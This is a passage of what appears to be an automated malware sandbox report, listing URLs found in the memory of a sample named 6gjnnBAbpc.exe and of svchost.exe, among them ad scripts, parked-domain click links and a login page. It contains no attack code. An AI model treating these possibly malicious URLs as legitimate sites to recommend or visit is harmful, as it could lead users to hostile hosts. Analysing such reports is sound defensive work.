6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/164.html
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/202.html
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gpthink.com/product/204.html
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.426960419.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.311949440.0000000008D74000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.325578885.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://hummer.hu/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334971541.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.545150504.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifdnzact.com/?dn=x0c.com&pid=9PO755G95
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.421703966.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                      Source: svchost.exe, 0000000F.00000002.641663075.00000000061DE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://juso-gr.ch/
                      Source: svchost.exe, 0000000F.00000002.641663075.00000000061DE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://juso-gr.ch//
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://megillah.demos.deo.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://megillah.demos.deo.com/?d=deo.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://megillah.demos.deo.com/?d=deo.com&fl=1&flr=-1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://megillah.demos.deo.com/?j=-1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668175631.0000000008D18000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://megillah.demos.deo.com/?j=-1&d=deo.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://megillah.demos.deo.com/caf_clicks.php?caf&pp=6&position=main&type=ad&nterm=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://megillah.demos.deo.com/caf_clicks.php?caf&pp=7&position=main&type=ad&nterm=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://megillah.demos.deo.com/search.php?caf
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435047729.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://mobilnic.net/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://myropcb.com/login/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 